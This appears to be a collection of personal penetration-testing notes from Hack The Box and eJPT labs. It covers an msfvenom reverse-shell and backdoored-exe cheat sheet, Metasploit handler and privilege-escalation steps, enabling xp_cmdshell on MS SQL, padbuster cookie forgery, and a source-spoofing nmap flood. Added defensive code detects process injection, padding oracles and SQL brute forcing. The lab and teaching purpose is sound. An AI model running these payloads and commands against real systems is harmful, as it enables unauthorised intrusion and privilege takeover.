Port Scan:
#nmap -sS -A -p- -T4 IP
#nmap -sS --script vuln -p Ports IP
Vulnerability Scan:
OpenVAS
Web Scan:
dirb
Dirbuster
Yyj-webspider
Paros
Burp Suite
Sqlmap
Exploitation:
msfconsole
meterpreter
exploitdb / searchsploit
Backdoor:
msfvenom
msfconsole handler
Thursday, May 28, 2020
[HTB][meterpreter][msfconsole][metasploit]Migrate the process in Meterpreter
meterpreter > ps
...
2660 1456 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
2732 604 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
meterpreter > migrate 2732
[*] Migrating from 1980 to 2732...
[*] Migration completed successfully.
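Meterpreter's migrate command moves the session by injecting into the chosen process and starting a thread there, which Sysmon records as Event ID 8 (CreateRemoteThread) with the source image, target image and the module backing the thread start address. The detection below is an added example, not part of the original post: it parses constructed Sysmon-style records (the source paths, the PIDs other than the migration target and the allowlist are sample data) and flags cross-process thread creation from non-allowlisted sources, rating a thread whose start address is not backed by any loaded module as high severity.

```python
import re

# Constructed Sysmon-style CreateRemoteThread records (Event ID 8), one event
# per line as key=value pairs. Real events come from the Sysmon channel or a
# SIEM; paths and PIDs are sample data, except that the target (davcdata.exe,
# PID 2732) mirrors the migration shown in the post.
SAMPLE_EVENTS = r"""
EventID=8 SourceImage=C:\Windows\System32\csrss.exe SourceProcessId=604 TargetImage=C:\Windows\System32\inetsrv\w3wp.exe TargetProcessId=2660 StartModule=C:\Windows\System32\ntdll.dll StartFunction=RtlUserThreadStart
EventID=8 SourceImage=C:\Windows\Temp\dropped.exe SourceProcessId=1980 TargetImage=C:\WINDOWS\system32\inetsrv\davcdata.exe TargetProcessId=2732 StartModule= StartFunction=
EventID=8 SourceImage=C:\Program Files\Vendor\monitor.exe SourceProcessId=3300 TargetImage=C:\Windows\explorer.exe TargetProcessId=1200 StartModule=C:\Windows\System32\kernel32.dll StartFunction=LoadLibraryW
EventID=1 Image=C:\Windows\System32\notepad.exe ProcessId=3100
"""

# Sources that legitimately create threads in other processes in this
# environment (a tuning list, constructed for the example; lowercase paths).
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
}

# key=value pairs; values run until the next " key=" or end of line, so paths
# with spaces ("Program Files") are kept intact.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?= \w+=|$)")


def parse_event(line: str) -> dict:
    """Turn one key=value record into a dict of field -> value."""
    return dict(FIELD_RE.findall(line.strip()))


def classify(ev: dict):
    """Return an alert dict for a suspicious CreateRemoteThread event, else None."""
    if ev.get("EventID") != "8":
        return None
    src = ev.get("SourceImage", "")
    if src.lower() in ALLOWED_SOURCES:
        return None
    # A thread that starts at an address with no backing module is the usual
    # sign of injected code (shellcode/reflective DLL) taking over the target.
    severity = "high" if not ev.get("StartModule") else "medium"
    return {
        "severity": severity,
        "source": src,
        "source_pid": int(ev.get("SourceProcessId", 0)),
        "target": ev.get("TargetImage", ""),
        "target_pid": int(ev.get("TargetProcessId", 0)),
        "start": ev.get("StartModule") or "<unbacked memory>",
    }


def detect(text: str) -> list:
    """Run classify() over every non-empty line and collect the alerts in order."""
    alerts = []
    for line in text.splitlines():
        if line.strip():
            alert = classify(parse_event(line))
            if alert:
                alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['severity']}] {a['source']} ({a['source_pid']}) -> "
              f"{a['target']} ({a['target_pid']}), thread start: {a['start']}")
```

On the sample data the csrss.exe event is dropped by the allowlist, the injection into davcdata.exe is reported as high because its thread start has no backing module, and the vendor agent's LoadLibraryW thread in explorer.exe is reported as medium for an analyst to tune away or keep.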
Monday, May 25, 2020
Sunday, May 24, 2020
[HTB]An example of Padding Oracle Attack
1) Obtain the suspicious cookie. In this case, the cookie is:
auth=ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy
2) Run the following command:
# padbuster http://10.10.XX.XX ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy 8 -cookies auth=ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy -encoding 0
-------------------------------------------------------
** Finished ***
[+] Decrypted value (ASCII): user=aaa
[+] Decrypted value (HEX): 757365723D6161610808080808080808
[+] Decrypted value (Base64): dXNlcj1hYWEICAgICAgICA==
-------------------------------------------------------
3) Generate a new cookie by running the following command:
# padbuster http://10.10.10.18 ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy 8 -cookies auth=ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy -encoding 0 -plaintext user=admin
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
-------------------------------------------------------
4) Use the new cookie to refresh the page. In this case, the new cookie is:
auth=BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
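Why padbuster can recover and re-encrypt the cookie above, as an added example that is not part of the original post: the server decrypts the CBC cookie, checks the PKCS#7 padding, and answers differently when the padding is wrong, so each forged byte leaks whether the padding became valid. The Python below (written for this page) builds that vulnerable cookie check next to an encrypt-then-MAC version and counts how many distinct answers a forger gets when varying one ciphertext byte. It assumes a constructed 8-byte toy block cipher (a Feistel network on HMAC-SHA256) in place of the real one, because the server-side check, not the cipher, is what creates or removes the oracle.

```python
import hashlib
import hmac
import secrets

BLOCK = 8  # padbuster was run with block size 8 above; the toy cipher uses the same size


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


# Constructed stand-in for a real block cipher: a 4-round Feistel network with
# HMAC-SHA256 as the round function. It is keyed and invertible, which is all
# CBC needs for this demonstration; it is not a real cipher and must not be reused.
def _round(key: bytes, i: int, half: bytes) -> bytes:
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[: BLOCK // 2]


def block_encrypt(key: bytes, blk: bytes) -> bytes:
    left, right = blk[: BLOCK // 2], blk[BLOCK // 2:]
    for i in range(4):
        left, right = right, _xor(left, _round(key, i, right))
    return left + right


def block_decrypt(key: bytes, blk: bytes) -> bytes:
    left, right = blk[: BLOCK // 2], blk[BLOCK // 2:]
    for i in reversed(range(4)):
        left, right = _xor(right, _round(key, i, left)), left
    return left + right


def pad(data: bytes) -> bytes:
    """PKCS#7: 'user=aaa' (8 bytes) becomes the 16-byte value padbuster printed above."""
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key: bytes, iv: bytes, pt: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out


# Vulnerable server: cookie = IV || CBC(pad(value)); a padding failure is
# reported differently from a wrong value. That difference is the oracle.
def make_cookie_vulnerable(key: bytes, value: bytes) -> bytes:
    iv = secrets.token_bytes(BLOCK)
    return iv + cbc_encrypt(key, iv, pad(value))


def check_cookie_vulnerable(key: bytes, cookie: bytes) -> str:
    try:
        value = unpad(cbc_decrypt(key, cookie[:BLOCK], cookie[BLOCK:]))
    except ValueError:
        return "padding error"  # distinguishable: padbuster decrypts byte by byte from this
    return "ok" if value.startswith(b"user=") else "denied"


# Hardened server: encrypt-then-MAC. The HMAC over IV||ciphertext is verified
# first, in constant time; a forged cookie never reaches the padding check.
def make_cookie_hardened(enc_key: bytes, mac_key: bytes, value: bytes) -> bytes:
    iv = secrets.token_bytes(BLOCK)
    body = iv + cbc_encrypt(enc_key, iv, pad(value))
    return body + hmac.new(mac_key, body, hashlib.sha256).digest()


def check_cookie_hardened(enc_key: bytes, mac_key: bytes, cookie: bytes) -> str:
    body, tag = cookie[:-32], cookie[-32:]
    if not hmac.compare_digest(tag, hmac.new(mac_key, body, hashlib.sha256).digest()):
        return "invalid"  # one uniform answer for every tampered cookie
    try:
        value = unpad(cbc_decrypt(enc_key, body[:BLOCK], body[BLOCK:]))
    except ValueError:
        return "invalid"
    return "ok" if value.startswith(b"user=") else "invalid"


def oracle_responses(check, cookie: bytes, pos: int) -> set:
    """Replace the byte at `pos` with every other value and collect the distinct
    server answers; more than one distinct answer means the server leaks
    information about the decryption of a forged cookie."""
    seen = set()
    for b in range(256):
        if b == cookie[pos]:
            continue
        seen.add(check(cookie[:pos] + bytes([b]) + cookie[pos + 1:]))
    return seen


if __name__ == "__main__":
    key, mac_key = secrets.token_bytes(16), secrets.token_bytes(16)
    c1 = make_cookie_vulnerable(key, b"user=aaa")
    c2 = make_cookie_hardened(key, mac_key, b"user=aaa")
    # Byte 15 is the last byte of the first ciphertext block; it controls the
    # last plaintext byte of block two, i.e. the padding length the server checks.
    print("vulnerable:", oracle_responses(lambda c: check_cookie_vulnerable(key, c), c1, 15))
    print("hardened:  ", oracle_responses(lambda c: check_cookie_hardened(key, mac_key, c), c2, 15))
```

For the vulnerable check the forger sees two distinct answers ("padding error" for almost every byte, "denied" for the one byte that makes the padding valid), which is exactly the signal padbuster searches for; the hardened check answers "invalid" for all 255 forgeries, so there is nothing to search. Any authenticated encryption mode (AES-GCM, or CBC with an HMAC checked before decryption as here) gives a web application the same property.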
Saturday, May 23, 2020
[HTB][msfvenom][metasploit]Msfvenom Cheat Sheet
#Copied from https://nitesculucian.github.io/2018/07/24/msfvenom-cheat-sheet/
MsfVenom is the Metasploit standalone payload generator that replaced msfpayload and msfencode.
Binaries
Creates a simple TCP payload for Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe
Creates a simple HTTP payload for Windows:
msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe
Creates a simple TCP shell for Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf
Creates a simple TCP shell for Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho
Creates a simple TCP payload for Android:
msfvenom -p android/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk
Web Payloads
Creates a simple TCP shell for PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.php
Creates a simple TCP shell for ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.asp
Creates a simple TCP shell for JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp
Creates a simple TCP shell packaged as a WAR:
msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war
PHP Payload:
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.XX.XX LPORT=4444 -a php -f raw > /home/demonalex/Downloads/example.php
Windows Payloads
Lists all available encoders:
msfvenom -l encoders
Binds an exe with a payload (backdoors an exe):
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe
Creates a simple TCP payload with the shikata_ga_nai encoder (3 iterations, null byte excluded):
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -b '\x00' -i 3 -f exe > example.exe
Binds an exe with a payload and encodes it:
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -i 3 -b '\x00' -f exe > example.exe
How do I get the meterpreter shell?
nli@nlistation:~$ sudo msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(multi/handler) > set lport 4444
lport => 4444
msf exploit(multi/handler) > run
Thursday, May 21, 2020
[HTB][meterpreter][msfconsole]Find Privilege Escalation exploits through Metasploit
meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.
meterpreter > background
msf > search local_exploit
msf > use 0
msf > set session 1
msf > run
[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 30 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
Wednesday, May 20, 2020
[HTB][meterpreter][msfconsole]A walkthrough of Privilege Escalation in Windows
meterpreter > getuid
Neither Administrator nor SYSTEM
meterpreter > cd %TEMP%
meterpreter > background
msf > use exploit/windows/local/ms10_015_kitrap0d
msf > set session 2
msf > set lhost 10.10.XX.XX
msf > run
msf > sessions -i 2
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Tuesday, May 19, 2020
[HTB] Some usage of smbclient
# smbclient -N -L \\\\10.10.10.XXX\\
# smbclient \\\\10.10.10.XXX\\Users "welcome20XX" -U "TempUser"
smb: \> get abcdef~1.txt
smb: \> get "New Text Document.txt"
Monday, May 18, 2020
[Linux]Use Zip to compress files in Linux with password protection
# zip -re ./test.zip ./file1 ./file2 ./folder1 ./folder2
Thursday, May 14, 2020
[HTB]Knock down MS SQL Server through xp_cmdshell
Assume that a username/password pair has already been obtained:
# mssqlclient.py account@10.10.10.xx -windows-auth
SQL> select IS_SRVROLEMEMBER('sysadmin');
SQL> EXEC sp_configure 'Show Advanced Options', 1;
SQL> reconfigure;
SQL> sp_configure;
SQL> EXEC sp_configure 'xp_cmdshell', 1;
SQL> reconfigure;
SQL> xp_cmdshell 'whoami';
[HTB]Listing and accessing remote shares through smbclient
Show remote shares:
# smbclient -N -L \\\\192.168.0.100
After all shares are listed, pick one and connect to it:
# smbclient -N \\\\192.168.0.100\\share1
Show content in the share:
smb: \> dir
Download a file from the share:
smb: \> get aaa.txt
[HTB]Auto Scan through NMAP
#!/bin/bash
echo "TARGET IP:"
read -r ip
# First pass: find every open TCP port quickly and collect them as a comma-separated list
ports=$(nmap -p- --min-rate=1000 -T4 "$ip" | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
# Second pass: default scripts and version detection on only the open ports
nmap -sC -sV -p"$ports" "$ip"
Wednesday, May 13, 2020
[HTB]POST HTTP data through Command Line
Example:
# curl -d "param1=value1&param2=value2" -H "Content-Type: application/x-www-form-urlencoded" -X POST http://localhost:3000/data
POST verb without any data:
# curl -XPOST https://www.xxxxxxxxx.xx/api/invite/generate
Tuesday, May 12, 2020
Saturday, May 9, 2020
Thursday, May 7, 2020
[eJPT][nmap]Apply Nmap to Synflood
Command:
#watch -n 10 "nmap -e wlan0 -Pn -T5 -S 192.168.0.253 192.168.0.251"
-e wlan0: Specify the network adapter that sends the packets.
-Pn: Skip the ping (host discovery) before launching the scan.
-T5: The fastest timing template.
-S 192.168.0.253: Spoof the packet source as 192.168.0.253.
192.168.0.251: The target.
The watch command relaunches the nmap scan every 10 seconds.
Monday, May 4, 2020
[eJPT][spider]A script for crawling websites as Web Grep
#!/usr/bin/perl -w
# This script is named after YYJ, who is my friend and a smart lady.
# It is used for CTF and written by demonalex.
use strict;
use warnings;
use Cwd;
use File::Path qw(make_path remove_tree);

$| = 1;
my $original_dir = getcwd;

# Random 8-letter working directory under /tmp for the mirrored site
my $folder = "";
for (0..7) { $folder .= chr( int(rand(26)) + 65 ); }
make_path("/tmp/$folder");
chdir "/tmp/$folder" or die "Cannot chdir to /tmp/$folder: $!\n";

print("Target URL (e.g. http://192.168.0.1:8080/ or http://www.163.com/): ");
my $target_url = <STDIN> // "";
chomp($target_url);
if ($target_url eq "") {
    die("Target URL is not defined!\n");
}

print("Maximum Recursion Depth (Default: 5): ");
my $mrd = <STDIN> // "";
chomp($mrd);
$mrd = 5 if $mrd eq "";

print("Keyword (Default: password): ");
my $keyword = <STDIN> // "";
chomp($keyword);
$keyword = "password" if $keyword eq "";

=pod
print("\$target_url : $target_url\n");
print("\$mrd: $mrd\n");
print("\$keyword: $keyword\n");
=cut

# Mirror the site into the working directory, then grep the mirror for the keyword.
# The list form of system() passes each argument as-is, so no shell quoting is needed.
system("wget", "-q", "-r", "-l", $mrd, $target_url);
print("----------------------------------------\n");
system("grep", "-nR", "-i", $keyword);
chdir $original_dir;
remove_tree("/tmp/$folder");
exit(0);
Sunday, May 3, 2020
[eJPT]Crack MS SQL Server
The main idea is shown below:
- First, obtain a username/password pair of the target, a MS SQL Server;
- Second, utilize Hydra to verify the username/password pair;
- Third, launch Metasploit-Framework to exploit the MS SQL Server through the following sequence:
* auxiliary/scanner/mssql/mssql_login
* auxiliary/admin/mssql/mssql_enum
* exploit/windows/mssql/mssql_payload
1) Obtain a username/password pair and verify that it works by applying Hydra:
#hydra -l admin -p test123 mssql://172.16.33.33
2) Verify the username/password pair by Metasploit Framework:
#msfconsole
msf5 > use auxiliary/scanner/mssql/mssql_login
msf5 auxiliary(scanner/mssql/mssql_login) > set rhosts xxx.xxx.xxx.xxx
msf5 auxiliary(scanner/mssql/mssql_login) > set username xxx
msf5 auxiliary(scanner/mssql/mssql_login) > set password xxx
msf5 auxiliary(scanner/mssql/mssql_login) > run
3) Enumerate the other users:
msf5 auxiliary(scanner/mssql/mssql_login) > use auxiliary/admin/mssql/mssql_enum
msf5 auxiliary(admin/mssql/mssql_enum) > set rhosts xxx.xxx.xxx.xxx
msf5 auxiliary(admin/mssql/mssql_enum) > set username xxx
msf5 auxiliary(admin/mssql/mssql_enum) > set password xxx
msf5 auxiliary(admin/mssql/mssql_enum) > run
4) Install a Meterpreter backdoor:
msf5 auxiliary(admin/mssql/mssql_enum) > use exploit/windows/mssql/mssql_payload
msf5 exploit(windows/mssql/mssql_payload) > set rhosts xxx.xxx.xxx.xxx
msf5 exploit(windows/mssql/mssql_payload) > set username xxx
msf5 exploit(windows/mssql/mssql_payload) > set password xxx
msf5 exploit(windows/mssql/mssql_payload) > set SRVPORT 53
msf5 exploit(windows/mssql/mssql_payload) > set payload windows/x64/shell_reverse_tcp
msf5 exploit(windows/mssql/mssql_payload) > set lhost xxx.xxx.xxx.xxx
msf5 exploit(windows/mssql/mssql_payload) > set lport 5555
#nc -k -l -p 5555
msf5 exploit(windows/mssql/mssql_payload) > exploit
5) Happy hunting!
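Both MS SQL posts above (enabling xp_cmdshell through sp_configure, and checking a username/password pair with Hydra or mssql_login) leave traces in the SQL Server ERRORLOG: a failed login is logged as error 18456 with the client address, and enabling xp_cmdshell logs "Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install." The monitor below is an added example, not from either post; the log lines it reads are constructed in ERRORLOG format with sample timestamps, spids and addresses, and the 60-second window and threshold of 5 attempts are assumed tuning values.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed ERRORLOG excerpt: real SQL Server message formats, sample data.
# 172.16.33.10 plays the client that is guessing passwords.
SAMPLE_ERRORLOG = """
2020-05-14 10:02:11.21 Logon       Error: 18456, Severity: 14, State: 8.
2020-05-14 10:02:11.21 Logon       Login failed for user 'admin'. Reason: Password did not match that for the login provided. [CLIENT: 172.16.33.10]
2020-05-14 10:02:14.07 Logon       Login failed for user 'admin'. Reason: Password did not match that for the login provided. [CLIENT: 172.16.33.10]
2020-05-14 10:02:19.55 Logon       Login failed for user 'admin'. Reason: Password did not match that for the login provided. [CLIENT: 172.16.33.10]
2020-05-14 10:02:20.90 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.7]
2020-05-14 10:02:25.12 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 172.16.33.10]
2020-05-14 10:02:31.48 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 172.16.33.10]
2020-05-14 10:02:40.02 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 172.16.33.10]
2020-05-14 10:03:40.55 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2020-05-14 10:03:41.02 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
"""

# ERRORLOG line layout: timestamp, source (Logon / spidNN / Server), message
LINE_RE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+)\s+(\S+)\s+(.*)$")
FAILED_RE = re.compile(r"Login failed for user '([^']*)'.*\[CLIENT: ([^\]]+)\]")
XPCMD_RE = re.compile(r"Configuration option 'xp_cmdshell' changed from 0 to 1")

WINDOW = timedelta(seconds=60)  # assumed tuning values for the guessing rule
THRESHOLD = 5


def parse_line(line: str):
    """Return (timestamp, source, message) for an ERRORLOG line, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S.%f"), m.group(2), m.group(3)


def scan_errorlog(text: str) -> list:
    """Single pass over the log; alerts are returned in the order they fire."""
    alerts, flagged = [], set()
    recent = defaultdict(deque)  # client address -> (time, user) pairs inside WINDOW
    for raw in text.splitlines():
        parsed = parse_line(raw.strip())
        if parsed is None:
            continue
        ts, source, msg = parsed
        if XPCMD_RE.search(msg):
            # Any enablement of xp_cmdshell is worth a ticket: it turns a SQL
            # login into OS command execution on the database host.
            alerts.append({"kind": "xp_cmdshell_enabled", "time": ts, "spid": source})
            continue
        m = FAILED_RE.search(msg)
        if not m:
            continue
        user, client = m.groups()
        q = recent[client]
        q.append((ts, user))
        while ts - q[0][0] > WINDOW:  # slide the window; the new entry always stays
            q.popleft()
        if len(q) >= THRESHOLD and client not in flagged:
            flagged.add(client)  # one alert per client, not one per further attempt
            alerts.append({"kind": "password_guessing", "time": ts, "client": client,
                           "attempts": len(q), "users": sorted({u for _, u in q})})
    return alerts


if __name__ == "__main__":
    for alert in scan_errorlog(SAMPLE_ERRORLOG):
        print(alert)
```

On the sample, the guessing rule fires at the fifth failure from 172.16.33.10 (10:02:31) and stays quiet for the single failure from 10.0.0.7, and the xp_cmdshell change by spid55 produces a second alert; the 'show advanced options' line is deliberately not matched, since it is a prerequisite rather than the dangerous change itself.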
[eJPT]Find files in Windows
Find files through their filename:
c:\>dir *password*.txt /s /b /p
Find files through their content:
c:\>findstr /s /m /i administrator c:\users